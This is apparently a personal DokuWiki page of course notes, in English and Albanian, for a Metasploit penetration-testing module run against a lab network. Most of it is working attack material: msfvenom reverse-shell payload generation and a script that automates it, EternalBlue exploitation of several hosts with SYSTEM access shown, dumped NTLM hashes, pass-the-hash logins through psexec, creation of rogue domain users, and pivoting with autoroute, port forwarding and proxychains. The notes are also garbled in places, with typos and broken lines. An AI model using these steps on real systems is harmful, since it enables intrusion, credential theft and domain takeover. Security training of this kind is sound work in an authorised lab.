User Tools

Site Tools


dardan:cyberacademy:module-3-pentesting-with-metasploit

Chapter 3 – Introduction to Metasploit

1. Picking an Exploit
2. Setting Exploit Options
3. Picking a Payload
4. Setting Payload Options
5. Running the Exploit
6. Connecting to the Remote System
7. Performing Post Exploitation Processes

msf > show exploits

      help search
      search ms17-010
      search cve:2013-3660
msf > search unreal
msf > info exploit/unix/irc/unreal_ircd_3281_backdoor
msf> use
msf> set


To start the Database at a terminal prompt, type the following:
● service postgresql start
● service metasploit start
● msfconsole

LHOST = Local Host, or our Kali System
RHOST = Remote Host, or our target System
LPORT = Port we want to use on our Kali System
RPORT = Port we want to attack on our target System

> use exploit/unix/irc/unreal_ircd_3281_backdoor
> show options
> set rhost 192.168.15.214
> exploit

##Multiple Target Types
> show targets
> use exploit/windows/smb/ms08_067_netapi
> show options
> show targets  
> set target 2
> show options
> show advanced  

##Picking a Payload  
> show payloads
> set payload
  examples:
  set payload osx/x86/shell_reverse_tcp
  set payload linux/x64/shell_reverse_tcp
  set payload windows/shell_reverse_tcp
 *set payload windows/meterpreter/reverse_tcp

reverse_tcp ##type of ways that the payloads communicate back to the attacking system

##Setting Payload Options
> show options
> set payload windows/meterpreter/reverse_tcp

##Running the Exploit
>show options
> set lhost 192.168.15.236 (kali)
> set rhost 192.168.15.243 (win)
> exploit

##Connecting to a Remote Session
> sessions ## To check what sessions were created
> sessions -i nr
meterpreter> ##prompt When we connect to the session
meterpreter> shell ##we can see that we do indeed have a remote shell to the Windows system.

Chapter 4 – Meterpreter Shell

word
permes smb script mund me ngarku ne qat doc
cfar malware eshte?
pivoiting | tunneling
autoraw
reverse vs bind

#############################################################################
28.05.2018 

rapid7 = metasploit  e shkruar ne ruby
development/perdorimi
exploit
vulnerability
threat
payload (e detekton antivirusi)
vspftpd 2.3.4 (vulnerable)

metasploit:
msfconsole (prefered)
msfvenom
msfpayload (bashk ne venom)
msf encode (bashk ne venom)
msfgui - depirciated
msfweb - depirciated

msfconsole (prefered):
armitage - gui per metasploit
modulet:
exploits
auxiliary
post
payload
encoders
nops

msfvenom
-p                  --payload
windows        #OS platforma
/meterpreter  #platforma, lloj i payloadit
reverse_tcp    #forma e komunikimit
LHOST=        #ip e jone e cila ka me komuniku me malware
LPORT=         #port jone ku kemi me prit komunikim
-f                  --Output format, exe or elf
-o                 --out           <path>       Save the payload   psh foto.exe
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost local ip
set lport local port
xploit
shell
dir :)

#############################################################################
###04.2018

RC scripta
#!bin/bash
echo -n
read
chmod  +x dardan
./dardan
example
msfvenon -p windows/meterpreter/reverse_tcp -f >shell.exe

==================================================
nano script.rc --create
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/meterpreter/reverse_tcp
set RHOST 172.16.60.88
exploit
sessions -i 1

msfconsole -r script.rc --to execute
==================================================
nano auto.sh -- to create the file
chmod +x auto.sh -- to make executable
./auto.sh -- to execute
--------------------------------
#!bin/bash

echo -n "Payload: "
read payload
echo -n "LHOST: "
read lhost
echo -n "LPOST: "
read lport
echo -n "Format: "
read format
echo -n "Name: "
read emri
msfvenom -p $payload LHOST=$lhost LPOST=$lport -f $format -o $emri.$format

==================================================
echo -n "Payload: "
read payload
echo -n "LHOST: "
read lhost
echo -n "LPORT: "
read lport
echo -n "Format: "
read format
echo -n "Name: "
read emri
msfvenom -p $payload LHOST=$lhost LPOST=$lport -f $format -o $emri.$format

echo "use exploit/multi/handler" > script.rc
echo "set payload $payload" >>script.rc
echo "set lhost $lhost" >> script.rc
echo "set lport $lport" >> script.rc
echo "exploit -j" >> script.rc

msfconsole -r script.rc

./auto.sh --to execute
==================================================
.#############################################################################
*11.06.2018*

kali - 172.16.60.78

*Pasi te marrim qasje.*

Vector of Attack
1. viber
check cfar app po perdor (psh viber)
explore a permban imortant data
2.
Outlook
mail files mundet mu marr prej hacked machine
outlook e run paswordin plaintext
3.
Skype
password e jep hashed, chat txt e jep clear text

*Qysh me marr qasje mrena?*

##Target network 172.16.0.0/20
##Enumeration
  SCAN: nmap 172.16.0.0/24  --make a default scan
              nmap -Pn 172.16.0.0/20 --Pn ping less
              nmap -O 172.16.0.0/20
##Targeted service 445 SMB (services open, version services psh ftp, 3389)

##Confirm vulnerable hosts
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 172.16.0.0/26
set threads 10
run
##VULNERABLE HOSTS
+  172.16.0.3:445        - Host is likely VULNERABLE to MS17-010!  (Windows Server 2008 R2 Standard 7600)
+  172.16.0.12:445       - Host is likely VULNERABLE to MS17-010!  (Windows 7 Ultimate 7601 Service Pack 1)
+  172.16.0.16:445       - Host is likely VULNERABLE to MS17-010!  (Windows 7 Ultimate 7601 Service Pack 1)
+  172.16.0.17:445       - Host is likely VULNERABLE to MS17-010!  (Windows 7 Ultimate 7601 Service Pack 1)
+  172.16.0.18:445       - Host is likely VULNERABLE to MS17-010!  (Windows 8.1 Pro 9600)
+  172.16.0.19:445       - Host is likely VULNERABLE to MS17-010!  (Windows 8.1 Pro 9600)
+  172.16.0.20:445       - Host is likely VULNERABLE to MS17-010!  (Windows 8.1 Pro 9600)

##EXPLOITATION
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 172.16.0.3   /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
exploit
set RHOST 172.16.0.12  /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
exploit
set RHOST 172.16.0.16  /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
exploit
set RHOST 172.16.0.17  /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
exploit
set RHOST 172.16.0.18  /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
exploit
set RHOST 172.16.0.19  /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
exploit
set RHOST 172.16.0.20  /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
exploit

##POST EXPLOITATION
use post/windows/gather/enum_domain --e gjen doamin srv
set session 1
run ( Cyberlab)

use post/windows/gather/smart_hashdump --nxerr dhe presenton sam/system 
set session 1
run
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:647a6dc3a05c2a2443ae9c03b5959c44
[+]     krbtgt:502:aad3b435b51404eeaad3b435b51404ee:822d4c38608cd94739144ace38e0a3db
[+]     Larry:1110:aad3b435b51404eeaad3b435b51404ee:847d0104f7c770d74cf4f3fcbaaacd65
[+]     John:1112:aad3b435b51404eeaad3b435b51404ee:849c695d5a50144028fd6c672b00d751
[+]     Lucia:1114:aad3b435b51404eeaad3b435b51404ee:78f25f28c59932b06b58b59711e8fb73
[+]     Marina:1116:aad3b435b51404eeaad3b435b51404ee:edef6c82896b00f277e5a46111f806a5
[+]     Alina:1117:aad3b435b51404eeaad3b435b51404ee:4484a79fef99132c010c98bde75c5399
[+]     Keith:1118:aad3b435b51404eeaad3b435b51404ee:7e2b029882be49edc5633b34d4db3e7e
[+]     Patrick:1122:aad3b435b51404eeaad3b435b51404ee:609dd6f9fc3d51b3d628219de6f91a8d
[+]     Marc:1124:aad3b435b51404eeaad3b435b51404ee:4297197418be7a0e111290f4fc341e67
[+]     Luke:1126:aad3b435b51404eeaad3b435b51404ee:faeadb333798089ee46de1f67740472d
[+]     Alfa:1130:aad3b435b51404eeaad3b435b51404ee:fd6e9a2f2646007192c7450ba21fb4df
[+]     Beta:1131:aad3b435b51404eeaad3b435b51404ee:8fb9d80ff33d178c16c3f43503468e83
[+]     WIN-GOMU62G0LQE$:1000:aad3b435b51404eeaad3b435b51404ee:c17b74d23f5be7ad4284283393636df9
[+]     LARRY-PC$:1111:aad3b435b51404eeaad3b435b51404ee:4b545d45b94464cfb56909fc8f7ddf1a
[+]     JOHN-PC$:1113:aad3b435b51404eeaad3b435b51404ee:0c913011dfdb67a9ca60b739fb578478
[+]     LUCIA-PC$:1115:aad3b435b51404eeaad3b435b51404ee:890f2e94b3239f87093e21724aabf141
[+]     KEITH-PC$:1119:aad3b435b51404eeaad3b435b51404ee:8a4d68ea1683fcbdaa73cba4e8a077ff
[+]     ALINA-PC$:1120:aad3b435b51404eeaad3b435b51404ee:4f9d70ddc18d29fa26634f1cf190c81f
[+]     MARINA-PC$:1121:aad3b435b51404eeaad3b435b51404ee:d128fd0a1972738bec382bd777d1a6ca
[+]     PATRICK-PC$:1123:aad3b435b51404eeaad3b435b51404ee:25d12edfe263dfa74d241b7eb8b39ea5
[+]     MARC-PC$:1125:aad3b435b51404eeaad3b435b51404ee:03eb6af971a5d16b38fd91703e034077
[+]     LUKE-PC$:1127:aad3b435b51404eeaad3b435b51404ee:73ab52f9d4900d661da3477b728ea366

use auxiliary/scanner/smb/smb_login
set smbuser John
set smbdomain Cyberlab
set smbpass (vlera e hash=John:1000:aad3b435b51404eeaad3b435b51404ee:fef77dfdc7e5cdd9b28593b2d58f49e1:::
set rhosts 172.16.0.0/26
set threads 10
set verbose false
run 
([+] 172.16.0.12:445 - 172.16.0.12:445 - Success: '.\John:aad3b435b51404eeaad3b435b51404ee:fef77dfdc7e5cdd9b28593b2d58f49e1' Administrator)

use exploit/windows/smb/ms17_010_eternalblue
on target172.16.0.18
verify then exploit
set porcessname lsass.exe
exploit =-WIN-=
getuid  /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM
sysinfo /PC info

use post/windows/gather/enum_applications
set rhost 172.16.0.3
run
use exploit/windows/smb/psexec
set payload windows/meterperter/bind_tcp
set rhost 172.16.0.12
set smbuser
set smbdom
set smb pass
expoit
run post/multi/gather/skype_enum
run
cat /home/.... --shihet skype chat me user e pass te nje email
rdesktop 172.16.0.13 -u Larry -p ESGL  -d CyberLab

use exploit/windows/smb/psexec
set smbdomain Cyberlab
set PAYLOAD windows/x64/meterpreter/bind_tcp
set rhost 172.16.0.12
exploit

exploit
getuid
shell
net user --i sheh users
net user John --i sheh infot e keti user
net user John  /domain --domain info

net user user1 password /add /domain --if denied
net user user1 password /add --add localy
net group "Domain Admins" /domain --tregon kush usera jane member


session
session -i
backgroud
-------------------------------------
run post/windows/gather
run post/windows/gather/credentials
run post/windows/gather/forensics

/vnc
/windows_autologon
/enum_domain
/enum_hostfile
/enum_chrom
/enum_ie
/enum_logged_on_users
/enum_ms_product_keys
/enum_putty_saved_sessions
/screen_spy
/usb_history
/screen_unlock

run post/multi/gather/
run post/multi/manage
skype_enum


.#############################################################################
18.06.2018

Vectors: Link, Email, Social Engeenering ...adobe flash vulnerabilities,
load option ne meterpreter???? 
query ne DC, impersonation, add user ad domain admin member, hack DC, 


Teknika: socks4, (auxiliary
               proxychains (tool, /ect/share/socks4
               portfwd (port forwarding, ne hacked machine e bon port fw port ne localhost IP -> ne hacker machine

tool: autoroute (POST tool)

Stage1 - autoroute
nmap -sn 172.16.0.0/24 (ping scan
nano  172.16.0.0.exe (e run scan rezult
nmap -sS -sV172.16.0.16 /gjen portet hap, banner grabbing (e run me nje file rezults

nmap -p445 --scripts smb-vuln-ms17-010 172.16.0.16 (tregon SMB vuln. infos, https://exploit-db.com (me marr info per naj exploit
msfconsole
msf>search ms17_010
use exp/win/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 172.16.0.16
exploit
.>getuid
.>shell
net user /domain
net user nt-authoriity pass /add /domain
net group "domain admin" /domain
.> ping 172.16.16.16 (ska ping
shell> ka ping
.> run post/multi/manage/autoroute
.>background
.>route
.> use aux/scan/portscan/tcp
set rports 445
set rhost 172.16.16.16
run (tash e sheh edhe IP e tjetrin interface
set rhosts 172.16.16.0-50 (range scan per 445
set threads 10
run
session -i 1
arp -a ( me pa me kan ka communicate pra i bon cach
meterpreter> run arp_scanner -r 172.16.16.0/24
.>background
set rhost 172.16.16.23
.>set ports 22 (konfirmon open ports
run
.>sessions
.>set rpots 1-1000
run

nga hacker machine sk aping 
meterpreter> portfwd add -l 21 -p 21 -r 172.16.16.23

nga hacker machine
ftp 172.16.16.23

meterpreter> run
nga hacker machine
ftp 172.16.16.23 (tash e qet hapur

meterpreter> portfwd flush
.> use aux/scanner/ftp/ftp_login
.>set rhosts 172.16.16.23
.>run ( tregon version dhe info tjera per servisin

.> use aux/scanner/ftp/anonymous
.>set rhosts 172.16.16.23
.>exploit

.> use aux/scanner/ftp/ftp_login
.>set rhosts 172.16.16.23
set password anonymous
run
.> sessions

meterpreter>portfwd -l 2221 -p 21 -r 172.16.16.23

nga hacker machine
ftp 172.16.16.23

nc  172.16.16.23 2221

meterpreter> portfwd flush
.>bckg
.>user aux/server/socks4a
.>run

nga hacker machine
nano /etc/proxychains.conf add socks4  127.0.0.1 1080
nmap 172.16.16.23 -p 21 (0 host up
proxychains nmap 172.16.16.23 -p 21
proxychains ftp 172.16.16.23 (vjen login
ftp>

nga hacker machine
proxychains firefox http://172.16.16.24
proxychains telnet 172.16.16.24 22

------------------------------------------------
use aux/server/
browser_autopwn2

.>set exitonsession
.>show advanced
meterpreter> use port/win/gather.enum_domain
.>set AutoRunScript port/win/gather.enum_domain (sessioni i marrur e bon run auto nje tjeter modul

.#############################################################################
nmap 60.52 -p- (all running port
-sS -SV -p51 60.52 (banner grabbing
nc 172.16.60.52 51
nano txt (ruje vleren en file
base64 or 32 -d txt ( e dekodon



############################################################################

############################################################################
dardan/cyberacademy/module-3-pentesting-with-metasploit.txt · Last modified: 2019/01/02 17:24 by dardan

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki